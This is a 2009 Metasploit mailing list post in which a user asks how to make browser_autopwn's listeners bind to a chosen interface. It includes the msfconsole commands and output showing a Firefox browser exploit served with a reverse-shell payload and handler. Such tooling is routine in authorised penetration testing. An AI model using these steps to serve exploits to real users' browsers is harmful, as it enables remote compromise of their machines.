Metasploit mailing list archives

Specify interface with browser_autopwn?

From: bcg at struxural.com (Ben Greenfield)
Date: Mon, 10 Aug 2009 10:05:52 -0400

Is there a way to specify which interface browser_autopwn will use?
I'd like to have the listeners spawn on a specific interface, but it
seems like its behavior is to spawn on the interface with the default
gateway.  Does it listen on all interfaces?  I may be using it
incorrectly as well, but I've tried a few combinations of
LHOST/SRVHOST to try to get the LOCAL IP once it's running to read as
what I'm expecting.

Here's an example of what I mean:

set LHOST 10.254.254.1
LHOST => 10.254.254.1
set SRVHOST 10.254.254.1
SRVHOST => 10.254.254.1
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 10.254.254.1...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload
generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/GqXTRJbF5EX4hY
[*]  Local IP: http://67.***.**.**:80/GqXTRJbF5EX4hY
[*] Server started.

If I want this to spawn on 10.254.254.1, doesn't the LOCAL IP also
need to be that same address?  Maybe I missed an option or a way to
specify interface?

Thanks,